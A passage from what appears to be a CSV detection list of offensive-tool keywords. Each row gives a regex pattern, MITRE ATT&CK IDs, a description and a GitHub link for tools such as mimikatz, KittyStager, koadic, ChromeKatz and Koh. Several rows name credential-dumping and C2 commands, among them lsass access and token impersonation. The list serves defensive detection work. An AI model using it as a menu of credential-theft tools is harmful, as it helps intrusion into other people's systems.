Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*kirbikator.exe*",".{0,1000}kirbikator\.exe.{0,1000}","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. 
potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","10","1336","206","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z" "*kite03/echoac-poc*",".{0,1000}kite03\/echoac\-poc.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*kitrap0d.x86.dll*",".{0,1000}kitrap0d\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kitrap0d_payload*",".{0,1000}kitrap0d_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kitten.dll*",".{0,1000}kitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*kitten/basicKitten*",".{0,1000}kitten\/basicKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*kitten_test.go*",".{0,1000}kitten_test\.go.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Kittens love cookies too! >:3*",".{0,1000}Kittens\slove\scookies\stoo!\s\>\:3.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*kittens/bananaKitten*",".{0,1000}kittens\/bananaKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Kittielocal -*",".{0,1000}Kittielocal\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*KittyStager -*",".{0,1000}KittyStager\s\-.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager ?*",".{0,1000}KittyStager\s\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager ??*",".{0,1000}KittyStager\s\?\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager.git*",".{0,1000}KittyStager\.git.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager/cmd*",".{0,1000}KittyStager\/cmd.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager/internal*",".{0,1000}KittyStager\/internal.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*KittyStager/kitten*",".{0,1000}KittyStager\/kitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Kiwi Legit Printer*",".{0,1000}Kiwi\sLegit\sPrinter.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*",".{0,1000}KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*kiwi_cmd *",".{0,1000}kiwi_cmd\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kiwi_cmd*/process:lsass.exe*",".{0,1000}kiwi_cmd.{0,1000}\/process\:lsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*KIWI_KERBEROS_BUFFER*",".{0,1000}KIWI_KERBEROS_BUFFER.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*klezVirus/CheeseTools*",".{0,1000}klezVirus\/CheeseTools.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*klezVirus/inceptor*",".{0,1000}klezVirus\/inceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*klezVirus/SilentMoonwalk*",".{0,1000}klezVirus\/SilentMoonwalk.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*klsecservices*",".{0,1000}klsecservices.{0,1000}","offensive_tool_keyword","Github Username","exploitation tools for attackers","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/klsecservices","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*klsecservices/rpivot*",".{0,1000}klsecservices\/rpivot.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*knavesec/CredMaster*",".{0,1000}knavesec\/CredMaster.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*kncchdigobghenbbaddojjnnaogfppfj*",".{0,1000}kncchdigobghenbbaddojjnnaogfppfj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*known_hosts2john.py*",".{0,1000}known_hosts2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Koadic.persist*",".{0,1000}Koadic\.persist.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_load.*",".{0,1000}koadic_load\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_net.*",".{0,1000}koadic_net\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_process.*",".{0,1000}koadic_process\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_types.*",".{0,1000}koadic_types\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koadic_util.*",".{0,1000}koadic_util\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*koh filter add SID*",".{0,1000}koh\sfilter\sadd\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh filter list*",".{0,1000}koh\sfilter\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that 
allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh filter remove SID*",".{0,1000}koh\sfilter\sremove\sSID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh filter reset*",".{0,1000}koh\sfilter\sreset.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh groups 
LUID*",".{0,1000}koh\sgroups\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh impersonate LUID*",".{0,1000}koh\simpersonate\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh release all*",".{0,1000}koh\srelease\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 